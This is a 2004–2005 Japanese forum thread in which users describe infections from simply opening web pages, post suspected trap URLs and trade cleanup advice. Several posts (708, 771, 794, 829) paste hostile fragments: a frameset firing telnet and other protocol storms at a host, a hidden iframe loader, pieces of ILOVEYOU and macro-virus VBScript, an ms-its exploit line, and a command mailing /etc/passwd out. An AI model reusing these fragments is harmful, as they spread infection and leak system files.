開いただけでウイルス ..
672:名無しさん@お腹いっぱい。
04/11/10 02:06:13
自分も探し物してたら、間違って感染したっぽいです。
なんかパソ起動時に、ダイヤルアップの接続が5回ぐらい勝手に出てきます。
いま、トレンドマイクロオンラインチェックしてますが、
もし感染が確認できたらどうすれば直せますか?
673:名無しさん@お腹いっぱい。
04/11/10 12:04:33
>672
ウイルスの種類にもよるし
ウイルスじゃないかも知れんし
それだけじゃわからん
674:672
04/11/11 05:59:12
今日スキャンしようとしたら、IEまともに開かないし、
IE起動時の設定のページいつもと違うし、
ダイヤルアップの接続が勝手に3回ぐらい出てくるし、
IE使い物にならない。(T_T)
昨日オンラインスキャンしたら感染してないって出たものの、
一昨日は3種類ぐらいに6項目ぐらい出てきた気が…
誰かどうにかしてください。(;_;)
とりあえず今日は携帯から。
ウイルスじゃないとしたらなにが考えられますか?
675:名無しさん@お腹いっぱい。
04/11/11 06:02:02
>>674
大変なのはわかるがマルチはやめとけ
逆に答えてもらえなくなるぞ
676:674
04/11/11 06:52:16
ウイルスなら一刻も早く被害が出る前に治したいもので…
やっぱりマルチだとマナー悪いとかネタとか荒らしに思われちゃいますかね?
とりあえずはスレ的にこっちの可能性もありだったんで書いたんですが…。
677:名無しさん@お腹いっぱい。
04/11/11 07:06:06
>>676
ブラウザジャッカーとかスパイウェアも関係してるんじゃない?
もう一台PCがあれば、ツールをDLしてくれば?
678:あぼーん
あぼーん
あぼーん
679:名無しさん@お腹いっぱい。
04/11/12 23:33:12
>>672
なあ、まさか感染してるPCで書き込んでないよな?
680:名無しさん@お腹いっぱい。
04/11/14 19:16:09
URLリンク(www.cty-net.ne.jp)
ここを開いたら、インターネットオプションのホームページのアドレスの所が
何度設定してもabouto:blankに戻り、広告がたまにpopupするようになり、
カチューシャのログのレスが全部&MESSAGEになって読めなくなりました。
ウイルス検索、spybot、adwareを使っても駆除できないのですが、
これはどうすればよいのでしょうか?
681:名無しさん@お腹いっぱい。
04/11/14 20:06:59
>680
ここの「※とりあえずの対処方法」みて対処、運がよきゃなおるだろ
URLリンク(foffo-gunkanmaki.hp.infoseek.co.jp)
682:名無しさん@お腹いっぱい。
04/11/15 14:02:22
>>681
IE6最新バッチ、ウィルスバスター2005+SPYBOT免疫+SpywareBlaster
俺もこれで踏んでみたくなった。
683:名無しさん@お腹いっぱい。
04/11/15 21:46:35
>682
別に止めやしないが、そこのページのリンク先も似たようなトラップの巣だから
下手にあちこちあけない方がいいぞ
684:名無しさん@お腹いっぱい。
04/11/20 11:27:47
IEが遅くなるウィルスってあります?
685:名無しさん@お腹いっぱい。
04/11/20 15:15:42
>684
IEの動きを遅くすることを目的としたウイルスは聞いたことがないが、
ウイルスの活動によって、結果的にIEの動作が重くなるのならありうる
686:sage
04/11/20 16:00:14
>>685
そうですか ありがとう
687:684
04/11/20 16:02:05
さがってなかった ごめんなさい
688:名無しさん@お腹いっぱい。
04/11/26 01:13:25
URLリンク(bubalom.by.ru)
URLリンク(bubalom.by.ru)
URLリンク(bubalom.by.ru)
URLリンク(bubalom.by.ru)
URLリンク(bubalom.by.ru)
人柱キボンヌ
689:名無しさん@お腹いっぱい。
04/11/26 01:14:12
う
690:名無しさん@お腹いっぱい。
04/11/29 03:55:16
※このアドレスは危険URLのひとつです。
691:名無しさん@お腹いっぱい。
04/11/29 11:31:02
このスレ開くだけで、avastに怒られるんだけど
692:名無しさん@お腹いっぱい。
04/12/02 19:54:29
随分と息の長いスレだなぁ。
(´ー`)y-~~
693:名無しさん@お腹いっぱい。
04/12/02 21:19:55
良スレage
694:名無しさん@お腹いっぱい。
04/12/02 22:26:29
>>688
スパイウエアなので注意
695:名無しさん@お腹いっぱい。
04/12/02 22:28:58
スレリンク(feti板)
の276。
696:名無しさん@お腹いっぱい。
04/12/02 22:40:09
>695
ただのgifファイルですが何か?
697:名無しさん@お腹いっぱい。
04/12/02 23:59:10
>>688のアド、なにも知らずに他のスレで踏んじゃった・・・
ノートン先生にパソコンスキャンしてもらったら
ウイルス4つ感染。一応修復だか、削除は完了したと出てきたけど・・・
他にしておいたほうがいい対処はありますか?
698:名無しさん@お腹いっぱい。
04/12/03 00:48:55
>>697
osの再インストール
699:名無しさん@お腹いっぱい。
04/12/04 01:43:17
URLリンク(ime.nu)
これは?
700:名無しさん@お腹いっぱい。
04/12/04 02:24:12
ここは鑑定スレじゃないんだけど。
701:名無しさん@お腹いっぱい。
04/12/04 10:05:14
HEZ E-ADDY
702:あぼーん
あぼーん
あぼーん
703:名無しさん@お腹いっぱい。
04/12/08 23:44:47
zg009174.ppp.dion.ne.jp
704:あぼーん
あぼーん
あぼーん
705:名無しさん@お腹いっぱい。
04/12/12 22:47:38
URLリンク(www.hellplant.org)
お願いします
706:名無しさん@お腹いっぱい。
04/12/14 07:06:12
>>705
注意!アラートオープンを発見! (1)
危険!ニュースストームを発見! (1)
危険!Telnetストームを発見! (1)
さらにIP抜きのオマケ付き
707:名無しさん@お腹いっぱい。
04/12/14 21:41:15
>>705
何が -厨房ホイホイ1号♪- だよ
痛くも痒くもないわ
708:名無しさん@お腹いっぱい。
04/12/15 09:12:31
<html>
<frameset rows="100%,0,0,0,0,0,0,0,0,0">
<frame src="URLリンク(www.hellplant.org)">
<frame src="fURLリンク(www.hellplant.org:3457)" scrolling=no noresize>
<frame src="gopher://www.hellplant.org:3457/" scrolling=no noresize>
<frame src="URLリンク(www.hellplant.org:3457)" scrolling=no noresize>
<frame src="pnm://www.hellplant.org:3457/pnmiptrace" scrolling=no noresize>
<frame src="mms://www.hellplant.org:3457/mmsiptrace" scrolling=no noresize>
<frame src="rlogin://www.hellplant.org:3457/" scrolling=no noresize>
<frame src="tn3270://www.hellplant.org:3457/" scrolling=no noresize>
<frame src="telnet://www.hellplant.org:3457/" scrolling=no noresize>
<frame src="news://www.hellplant.org:3457/" scrolling=no noresize>
</frameset>
</html>
709:名無しさん@お腹いっぱい。
04/12/17 09:48:20
開いただけのページで1500くらいウィルスに感染したぽ・・・・・
710:名無しさん@お腹いっぱい。
04/12/17 10:03:49
>>705この板では、鑑定はしません。
ラウンジURLリンク(ex7.2ch.net)の
勇気が無くて見られない画像解説スレ Part649
スレリンク(entrance板)l50へ。
(またはラウンジのTOPページ内を「勇気が無くて見られない」で検索して最新スレへ)
711:名無しさん@お腹いっぱい。
04/12/17 21:44:48
マジなことなんだけどね、このページ開いたらavastが反応した。
なんで?
712:名無しさん@お腹いっぱい。
04/12/17 22:40:17
>711
上の方にアンチウイルスソフトが誤反応するような文字列が書き込まれてるから
713:名無しさん@お腹いっぱい。
04/12/19 07:06:44
スレリンク(pcqa板)l50
714:UNIX.Penguin
04/12/21 15:56:41
Symantec マンセー
ヽ(´▽`)ノ
715:名無しさん@お腹いっぱい。
05/02/02 10:40:53
URLリンク(users3.cgiforme.com)
ノートパソコンでここを開いたらいっぱい画面が出てきてしまい、
強制終了させられてしまいます。
どうしたらいいんでしょうか?
本当に困っています;;
もう簡単にURLふんだりしないので教えてください!
修理に出すしかないんでしょうか?;;
716:名無しさん@お腹いっぱい。
05/02/02 10:50:30
>>715
おめえバカだろ?
ウィンドウズアップデートはしていないは、
ウィルス対策ソフトはいれていないは
717:名無しさん@お腹いっぱい。
05/02/02 10:51:49
>>716
すみません。怒らないで。。
どうしたら良い?
718: ◆VIRUSzXyeo
05/02/02 10:59:08
>>715
ココ見ておいで。
エロサイト見たら…助けて下さい!Part49
つスレリンク(pcqa板:-10番)
719:名無しさん@お腹いっぱい。
05/02/02 11:04:11
>>717
まず起動時にF8押してセーフモードで起動する
XPだろうから
C:\Documents and Settings\ユーザー名\Local Settings\Temp
C:\WINDOWS\Downloaded Program Files
これらのフォルダ内のファイルを全部削除
インターネット一時ファイルを全部削除
これをやってから、インストールされてしまったスパイウェアの駆除を始める
スレリンク(pcqa板:1-9番)
720:名無しさん@お腹いっぱい。
05/02/02 11:11:04
>>718
>>719ありがとう;;
頭いいしやさしいし。付き合いたいくらいだよ。
本当にありがとう。やってみます。
721:名無しさん@お腹いっぱい。
05/02/02 11:27:47
>>720
〃 i, ,. -‐
r' ィ=ゝー-、-、、r=‐ヮォ.〈 /
! :l ,リ|} |. } / .や
. {. | ′ | } l
レ-、{∠ニ'==ァ 、==ニゞ< | ら
!∩|.}. '"旬゙` ./''旬 ` f^| |
l(( ゙′` ̄'" f::` ̄ |l.| | な
. ヽ.ヽ {:. lリ |
. }.iーi ^ r' ,' ノ い
!| ヽ. ー===- / ⌒ヽ
. /} \ ー‐ ,イ l か
__/ ‖ . ヽ、_!__/:::|\ ヽ
722:名無しさん@お腹いっぱい。
05/02/02 11:28:53
>>720
さっさと直してしまいたい時
システムの復元
少しは勉強しとこうと思う時
テンプレを実行
723:名無しさん@お腹いっぱい。
05/02/02 11:30:56
>>722
理解しました。どうもありがとう。
ちゃんと勉強します。
724:名無しさん@お腹いっぱい。
05/02/02 19:37:22
最近2ちゃんのスレを開いたら警告が出てくるのですが、修復不可能且つウィルスへのアクセス拒否で
駆除をすることができません。bloodhound.Exploit6という名前です。
725:あぼーん
あぼーん
あぼーん
726:あぼーん
あぼーん
あぼーん
727:名無しさん@お腹いっぱい。
05/02/14 18:20:56
URLリンク(users3.cgiforme.com)
728:名無しさん@
05/02/15 13:37:37
セキュリティに詳しい方に御質問
私のPCがどうやらスパイウエアらしきものに感染?してしまったのですが、
駆除の仕方がわかりません。エクスプローラーを開くと
URLリンク(vv2.s13.tempx.cc)
↑が開き、英文でどうやら「あなたのPCはモニタリングされています」
といったような内容が書かれておるのですが、これは放置したままで
問題ないのでしょうか?教えて下さい。
729:名無しさん@
05/02/15 13:40:05
追記
ネットサーフィンするには、特に問題ないのですが、毎回上記の記載
したURLが出てくるので目障りです。
なんとかならないでしょうか、、、
730:名無しさん@お腹いっぱい。
05/02/16 08:01:38
URLリンク(qrl.jp)
↑はどうですか?
なんか血の涙を流してる女性の画像が出て
「ぎゃあああああああああああああああああああ」
って声が出て、
「あなたのPCは36時間以内に呪われます」
みたいなのがでたんですが。
731:名無しさん@お腹いっぱい。
05/02/16 17:17:56
>>728
とりあえずSpybot、Ad-Aware SE、CWShredder
を試してみたら?
732:コーラック ◆S2OnalVgus
05/02/17 03:34:07
ったまくるよぉ・・・・・
GoldenRetrivereだっけか?あんの野郎偽装ファイルまではいいけどSP2のダミーにリンク張ってるから
思わず削除してまったよぉぉおおお。
修復でリカバリできたからいいけど依存関係にまで手を加えれるものなんだろか?
くっそ〜AltaVistaでLongHornなんて探すんじゃなかったよ・・・・
733:名無しさん@お腹いっぱい。
05/02/17 04:40:34
この前、「2ちゃんねるの こんな時計はイヤだ!その2」のどこかのリンクを踏んで、海外のホームページのフラッシュ画像を閲覧しただけで、
軽いウィルスに感染してしまいました。「Trojan.ByteVerify ウイルス」でした。ページを開いた途端にNorton AntiVirusがはじき、
「感染しています。」というメッセージが出てびっくりしました。その後、ウィルスチェックしてみると、IEの一時ファイルのところで
ウイルスが1つだけ見つかりました。もちろん駆除できましたが。
ウィルス対策ソフトを入れておいて本当に良かったです。あと少しで期限が切れますので、新しいソフト購入を検討してます。
734:名無しさん@お腹いっぱい。
05/02/17 10:54:08
>>733
NAV2005優待版買ってください。
735:名無しさん@お腹いっぱい。
05/02/19 22:57:00
>>732
買いますた
736:名無しさん@お腹いっぱい。
05/02/21 21:18:25
初めまして。ちょっと種類の違う質問ですがご了承ください。
Windowsとノートンのアップデートは最新版でウイルスチェックをして
「脅威は見つかりません」と出れば、もう安心してよろしいのでしょうか?
それともノートンで見つからない脅威もあるのでしょうか?
737:名無しさん@お腹いっぱい。
05/02/21 21:23:21
>>736
いっぱいあるわな
だから、予防の方が大切
738:736
05/02/21 21:48:48
>>737
そうなんですか…毎日アップデートはチェックしているんですが
今日ブラクラ踏んでしまって、Trojan byteVerifyってウイルスが
一時検出されました。
再起動して一時ファイル消してチェックしたところ、何も
検出されなかったので安心したのですが…油断しない方いいみたいですね。
739:名無しさん@お腹いっぱい。
05/02/24 02:13:48
Linuxユーザになってから、ブラクラもウィルスサイトも
踏んで踏んで踏みまくっている。Windows時代には怖くて
近づくことすら出来なかったサイトを、踏みまくって気分爽快。
俺の靴の底の味はどーよ?ってな気分だ。
740:名無しさん@お腹いっぱい。
05/02/24 02:19:31
>>739
グロ画像はOS何使っててもアウトだがな。
741:名無しさん@お腹いっぱい。
05/02/24 02:22:24
>>739
酷い目に合わされた過去への清算?なの...
742:あぼーん
あぼーん
あぼーん
743:名無しさん
05/03/03 00:18:42
>>738
そういう時こそ、HD革命WinProtectorを使ったら、再起動時に感染の痕跡まで消してくれるぜ。
744:名無しさん@お腹いっぱい。
05/03/03 00:41:40
このスレの「全部」部分をクリックすると、Avast!が警告を出すんですが?
745:名無しさん@お腹いっぱい。
05/03/03 00:50:01
URLリンク(ip3e83566f.speed.planet.nl)
踏んだんですけど、JS_PSYME.Vのウイルス(セキュリティーホールを
突いたWMP破壊スクリプト)が潜んでるらしいです。
このウィルスって
URLリンク(www.trendmicro.co.jp) (TrendMicro)
URLリンク(www.symantec.com) (symantec)
で検出できますか?検出されたときの対処法を教えてください
746:名無しさん@お腹いっぱい。
05/03/03 01:58:00
>>745
AntiVirというフリーソフトで検出できたヽ(´ー`)ノ
747:名無しさん@お腹いっぱい。
05/03/03 11:33:49
>>745
なんだ ノートンでもマカフィーでも検知するんじゃないかよ
748:名無しさん@お腹いっぱい。
05/03/03 11:37:04
>>745
随分と古いなあ
URLリンク(www.mcafeesecurity.com)
749:名無しさん@お腹いっぱい。
05/03/14 20:09:30
URLリンク(srd.yahoo.co.jp)
は平気で、しょうか?
750:名無しさん@お腹いっぱい。
05/03/14 22:12:02
ここは鑑定スレじゃないんだが。
つーか、ローマ字も読めないとは。
751:名無しさん@お腹いっぱい。
05/03/14 23:29:26
URLリンク(www.geocities.jp)
752:名無しさん@お腹いっぱい。
05/03/16 02:15:18
URLリンク(www.google.co.jp)
これ踏んじゃいました・・・。
周りのレスでウィルスだと騒がれていたのですが、やばいですか?
URLがGoogleのものだから大丈夫だと思ってなんの警戒もしてませんでした(^^;
753:名無しさん@お腹いっぱい。
05/03/16 04:23:08
初歩的なブラクラだな
754:名無しさん@お腹いっぱい。
05/03/20 01:36:41
>>749
鑑定はこっち
URLリンク(security.bbs.thebbs.jp)
>>752
※ Location ヘッダを発見しました。
※このアドレスは危険URLのひとつです。
URLリンク(www2.strangeworld.org)
ブラクラチェックを終了します。
だそうだ。ウイルスかと思ったらまず駆除ソフトを使うべす。
持ってなかったらノートン先生(2005)が1ヶ月お試し版あるから。
やばいかどうか鑑定なら>>754の最上部のアドレスへ。
755:名無しさん@お腹いっぱい。
05/03/20 02:16:02
URLリンク(213.159.117.133)
URLリンク(69.50.191.68)
756:名無しさん@お腹いっぱい。
05/03/24 10:20:53
ウイルスバスターを使っているのですが、ここにあるリンクを踏んだら感染しますか?
757:この板では鑑定はしません
05/03/24 10:32:40
この板では、鑑定はしないです。
鑑定して欲しい人は>>754の上のサイトか、
ラウンジ@2ch掲示板URLリンク(etc3.2ch.net)の
勇気が無くて見られない画像解説スレ Part681
スレリンク(entrance板)l50へ。
スレが見つからないときはラウンジ板内を「勇気」「画像解説」などで検索。
>>756
鑑定スレではないのでご自分で試してください。自己責任で。
758:名無しさん@お腹いっぱい。
05/03/24 10:51:54
>>756
ウィンドウズアップデートしていないやつはすり抜けられたら
マジでスパイウェアを放り込まれる
759:名無しさん@お腹いっぱい。
05/03/24 10:54:56
>>752
<HTML>
<img src="sahra9714.jpg">
</HTML>
ソース こんなんでウィルス仕込めるかよ
760:名無しさん@お腹いっぱい。
05/03/24 11:08:47
だから相手するなよ。鑑定スレじゃないんだから。
ウィルス食らった(かも知れない)香具師は質問スレへどうぞ。
761:名無しさん@お腹いっぱい。
05/03/26 19:49:31
URLリンク(www2.strangeworld.org)
ブラクラチェッカーで確認
URLリンク(www.7walker.com)
> ※このアドレスは危険URLのひとつです。
> 注意!アラートオープンを発見! (3)
> 注意!ループタグを発見! (2)
> 危険!mailtoストームを発見! (380)
> 危険!無限ループを発見! (2)
> 危険!Telnetストームを発見! (3)
762:名無しさん@お腹いっぱい。
05/03/27 03:10:13
>>733
V3ウィルスブロック2005を購入しました。その代わり、ファイアーウォールの監視が
厳しくなりましたが、ウィルスに感染するよりはマシだと観念しました。
763:名無しさん@お腹いっぱい。
05/03/28 15:08:33
つ
URLリンク(oss.jodi.org)
764:名無しさん@お腹いっぱい。
05/03/28 19:28:53
URLリンク(omanko45.tvheaven.com)
765:名無しさん@お腹いっぱい。
05/03/28 19:57:53
これって何?
URLリンク(www12.plala.or.jp)
766:名無しさん@お腹いっぱい。
05/04/06 20:42:15
URLリンク(gazo03.chbox.com)
767:nec
05/04/06 20:46:12
URLリンク(virus.bcasj.or.jp)
これってウィルスですか。
768:名無しさん@お腹いっぱい。
05/04/09 19:38:30
URLリンク(www.medianetjapan.com)
さきほど、これを踏んでえらい事になったんですけどやはりウィルスですか?
769:名無しさん@お腹いっぱい。
05/04/09 20:29:41
>>765
ウホッ
770:あぼーん
あぼーん
あぼーん
771:名無しさん@お腹いっぱい。
05/04/16 19:20:05
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
772:名無しさん@お腹いっぱい。
05/04/17 13:42:39
URLリンク(lolworld.ecstazy.info)
773:名無しさん@お腹いっぱい。
05/04/18 01:22:50
糞炉利サイト死ね!!!11!1!!勝手に飛ばすなボゲェェェェ!!!
774:名無しさん@お腹いっぱい。
05/04/20 23:13:45
URLリンク(www.tiduru.sytes.net)
775:名無しさん@お腹いっぱい。
05/04/21 09:38:58
776:名無しさん@お腹いっぱい。
05/04/29 13:01:32
URLリンク(www.town.kashimadai.miyagi.jp)
地方自治体の公式ページなんだけど、下のほうにある掲示板をみると反応します。
777:名無しさん@お腹いっぱい。
05/04/29 13:03:17
>>768
※このアドレスは危険URLのひとつです。
危険!Telnetストームを発見! (400)
778:名無しさん@お腹いっぱい。
05/04/30 14:10:47
>>776
一回目はjavascripを使ったウイルスで10個来た。
もう一回踏んでみると、HTML_REDIR.A コレだ!
まぁセキュリティソフト入ってるんなら入っても問題なし。
PCがガリガリいうだけ
779:名無しさん@お腹いっぱい。
05/04/30 14:24:49
>>776
海外アダルトが出てくるなwなかなか粋なHPだ
780:名無しさん@お腹いっぱい。
05/05/06 21:12:09
ノートン入れた状態でここ開くと五月蝿いですよね。
781:名無しさん@お腹いっぱい。
05/05/06 21:19:26
URLリンク(138.139.148.210.dy.bbexcite.jp)
おkwwwうぇうぇっおkwwwおkwっwうはっっおk
wっおkwwwwwwwっwwwwwwwwwwww
っwwwwwwwwwwwwwwwうぇうぇwうはっ
うぇwwwwうはっwwwwwwwwwうはっwっ
うぇおk
782:名無しさん@お腹いっぱい。
05/05/10 20:55:59
URLリンク(www.pornbook.net)
これ踏んでえらいことになったんですけど、ここで感染するウイルス達って
PC内のいろんなデータを外部に流出する類のやつなんでしょうか?
教えてください。
783:名無しさん@お腹いっぱい。
05/05/10 21:40:52
>>782
うちでは何ともならないが?
784:名無しさん@お腹いっぱい。
05/05/10 21:44:58
>>782
たぶんトロイだろう
こっちで調べたらとりあえず"Trojan.Win32.StartPage.pz."なんてのが引っ掛かった
785:名無しさん@お腹いっぱい。
05/05/10 21:53:48
>>782
JAVA_BYTEVER.Aてのが3個
786:名無しさん@お腹いっぱい。
05/05/15 07:54:00
このスレにはったあるのでノートンやバスターをかいくぐり
windowsの動作に影響を及ぼすサイトってある??
787:名無しさん@お腹いっぱい。
05/05/16 14:40:17
788:名無しさん@お腹いっぱい。
05/05/16 14:45:53
価格comがやばいらしい。
789:名無しさん@お腹いっぱい。
05/05/16 21:34:22
URLリンク(www.prenavi.net)
Trojan.AnicmooとTrojan.ByteVerifyが見つかったんだが、どこに仕掛けてあるんだ?
790:名無しさん@お腹いっぱい。
05/05/20 20:59:03
AVGで片っ端から踏んだけど何もでないや??
791:名無しさん@お腹いっぱい。
05/05/20 23:04:12
そりゃ糞いや。
792:名無しさん@お腹いっぱい。
05/05/21 00:20:13
>>790
まさにWindows Updateに救われているソフトですな
793:名無しさん@お腹いっぱい。
05/05/21 12:23:04
この板のトロイの木馬2台目というスレで即ノートン先生が検出したぞ!
ウィルス張ったやつ市ね。
794:名無しさん@お腹いっぱい。
05/05/21 12:27:52
>>789
<HTML lang="ja">
<HEAD><TITLE>画像掲示板(Light)</TITLE>
<STYLE>
</STYLE>
</HEAD>
<BODY BGCOLOR="#FAF0E6" BACKGROUND="" TEXT="#2F4F4F" LINK="#6060FF" VLINK="#4040FF">
<BR>
<FONT SIZE="+1" COLOR="#FF0000"><B> </B></FONT>
名前:<FONT COLOR="#00FF00"><B> </B></FONT>
[2005/05/08,11:10:23] No.271 <a href="imgboard.cgi?bbsaction=disp_rep_form&amode=&page=1&blood=20050508111023&parent=271">返信</a>
<BLOCKQUOTE><!-- body_start -->
<a target="_blank" href="URLリンク(lol.to)">HOT PUSY</a><br><BR>URLリンク(lol.to)
<iframe src="URLリンク(www1.pimpspace.com)" height="1" width="1"></iframe><!-- user: ?igip-fo.rzone.de-->
</BLOCKQUOTE>
</BODY>
</HTML>
795:名無しさん@お腹いっぱい。
05/05/21 12:38:14
>>789
腐れにちゃんが! この程度のソースくらい投稿させろや
このソースの一部で反応するから、html保存して実行してごらん
URLリンク(81.222.131.59)
URLリンク(81.222.131.59)
URLリンク(205.252.250.226)
いわゆるこれらのファイルを読み込んで実行しようとしている
つまり、これら画像プレビュー表示のある掲示板だと、
表示しただけでIEの脆弱性を利用される事になるから、
Windows Updateしていないくて
使っているウィルス対策ソフトもスルーした場合、
ウィルスのインストーラーが実行されてウィルスに感染する事になる。
削除しない管理人は、これらの脆弱性に対して無知なんだろうけどな!
わざとかもしれないけどな
796:名無しさん@お腹いっぱい。
05/05/21 12:56:44
age
797:名無しさん@お腹いっぱい。
05/05/21 13:15:45
この脆弱性を利用された場合、これらを利用するDownload Ject関連の脆弱性を残したままでいると、
ウィルスだけじゃなくて、仕込んだやつに知識があってプログラムも書けるやつだと、
コンピュータ内のファイルを切り刻んだり、システムファイルを消してしまったり、
実際に何でも可能で悪質なプログラムを実行されてしまう。
798:名無しさん@お腹いっぱい。
05/05/21 21:21:55
>>795
URLリンク(205.252.250.226)
こっちが今ダウンロードされるようになっているらしい
799:名無しさん@お腹いっぱい。
05/05/22 05:00:20
>>795のサイトは死んでいたりする時もあって悪質だな
今は生きているわ
800:名無しさん@お腹いっぱい。
05/05/22 16:26:15
>>789
ウイルスバスターで踏んでみたけどHTML_REDIR.Aしか検知しなかったorz
801:名無しさん@お腹いっぱい。
05/05/26 11:04:38
URLリンク(cgi36.plala.or.jp)
ここ踏んじゃったんですけど、ウイルスありますか??
802:名無しさん@お腹いっぱい。
05/05/26 11:29:32
>>801
この板では鑑定はしない。自分でウィルススキャンするか、
ラウンジ@2ch掲示板URLリンク(etc3.2ch.net)の
勇気が無くて見られない画像解説スレ Part704
スレリンク(entrance板)へ。
803:名無しさん@お腹いっぱい。
05/05/26 11:31:40
>802
わかりました。
どーもです。
804:名無しさん@お腹いっぱい。
05/05/28 14:40:29
すいません教えてほしいのですがブラクラふんでしまい
ウイルスアラートがでてしまったのですがひとつウイルスが削除できません
でしたみたいなのがでたんですがどうしたらいいでしょうか?
トレンドでオンラインスキャンしたらHTML_REDIR.Aというウイルスでした
ウイルス対策ソフトはVirus scanの最新版をつかっても
アラートに反応しませんでした
パソコン初心者なのでどうしたらいいかわからません
ウインドウズXPですああぁ〜どうしよう・・・・
誰か教えてください・・・・
805:名無しさん@お腹いっぱい。
05/05/28 15:12:36
URLリンク(www.prenavi.net)
806:名無しさん@お腹いっぱい。
05/05/28 15:48:20
URLリンク(www.prenavi.net)
807:名無しさん@お腹いっぱい。
05/05/28 20:30:57
インターネットオプションのファイル削除でキャッシュファイルを削除すれば、多分消えるぞ!
クッキーも念のため消してくれ
それでも、だめなら感染したファイルを手動で消してくれ。
808:名無しさん@お腹いっぱい。
05/05/28 22:20:46
スレリンク(koumu板)l50
809:名無しさん@お腹いっぱい。
05/05/29 17:44:22
>>804
パソコン、買い替えだね。
あと、すでに知人から恨まれているはずだから、皆に謝っておくように
810:名無しさん@お腹いっぱい。
05/05/29 17:56:08
>>804
URLリンク(www.trendmicro.co.jp)
たいしたことないじゃん。
811:名無しさん@お腹いっぱい。
05/05/29 21:06:14
あのう
声優板を見ようとすると、それだけで
Nortonがウイルスを検知するんですけど、これはいったいどーゆー事でしょうか?
812:名無しさん@お腹いっぱい。
05/05/30 00:25:20
このページ開いたら俺のNOD32が反応したんだが、どこぞのカキコですか?
813:名無しさん@お腹いっぱい。
05/05/30 03:23:48
>>784の"Trojan.Win32.StartPage.pz.に感染してしまったのだがどうしたらいいのでしょう?
ちなみにSD画像掲示板って所を開いただけで感染しますた。
814:名無しさん@お腹いっぱい。
05/05/30 21:06:14
>>813
URLリンク(www.trendmicro.co.jp)
コレと同じものかも。
815:名無しさん@お腹いっぱい。
05/05/30 21:45:27
URLリンク(www.cjinternet.jp)
(↑ cjインターネットジャパン、ここの
URLリンク(game.netmarble.jp)
↑ここを開いたら
VBが TSPY_LINEAGE.AP を見つけるのよね。。。
コレって・・・どうなの?
816:名無しさん@お腹いっぱい。
05/05/30 21:48:59
>>815
火狐では表示されない
817:名無しさん@お腹いっぱい。
05/05/30 21:55:28
iframeでなんか仕込んであるようだがスクリプト読むの('A`)マンドクセ
818:名無しさん@お腹いっぱい。
05/05/30 22:38:01
>>815
スクリプトで引っ掛かるようなものなんてないね
誤認
Activexコントロールインストールのポップアップに反応しているのかも?
819:名無しさん@お腹いっぱい。
05/05/31 00:36:07
>815
フリーのゲームサイトでこんなのほっとくとわ
さすがキムチの国ですよね
820:名無しさん@お腹いっぱい。
05/06/01 06:38:07
※緊急※
第二の価格コム事件とも言える「ozmall」のサーバがクラックされた事件の場合では、
現時点でマカフィーとアンラボ製品が問題のウイルスを検出できてます。
URLリンク(www.ozmall.co.jp)
検出 駆除
マカフィー(Managed VirusScan) 可 可
アンラボ(V3ウイルスブロック2005) 可 可
NOD32 不能 不能
821:名無しさん@お腹いっぱい。
05/06/03 01:39:31
宣伝おめ
822:名無しさん@お腹いっぱい。
05/06/03 02:27:42
nyでDLしたファイル(H系)解凍した瞬間にCドライブ内のJPEGとZIPファイルが全部壊れました。
容量が全部26KBになってました。ny見てみたらノード情報のとこに「ぬるぽ」と「ガッ」のAAが…
その後ny起動させても全く動きません。新しくny本体をDLして前と同じ設定しても動きません。
ウイルスバスターで検索してもなにもひっかかりません。nyが動かない以外は別に何も症状ないんですが…
誰か詳しく教えてください、よろしくお願いします…
823:名無しさん@お腹いっぱい。
05/06/11 14:21:52
>>822
最インスコ
824:名無しさん@お腹いっぱい。
05/06/14 00:45:31
何が凄いってこのスレをIEで開いた時に警告が出てしまった事。
avastってそれなり?
825:名無しさん@お腹いっぱい。
05/06/14 14:50:26
上げ
826:名無しさん@お腹いっぱい。
05/06/14 17:55:29
半角2次元板を開くと
Bloodhound.Exploit.6ってのを検知したんですが・・・。
2回やってみましたがノートン先生が2回検知しました。
827:名無しさん@お腹いっぱい。
05/06/14 19:01:22
これか。 半角系狙われてんなぁ
スレリンク(ascii2d板)
>>826
専用ブラウザlive2chとノートンを使ってる方へ
スレリンク(ascii板)
828:名無しさん@お腹いっぱい。
05/06/17 21:26:27
ソースとAVGを入れて「782」のURLを踏んでみたら,
AVGの方が反応しました。S社の性能はフリー以下なんでしょうか・・・?
829:名無しさん@お腹いっぱい。
05/06/21 13:36:19
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz)" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kak.hta';ken=wdt'START
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
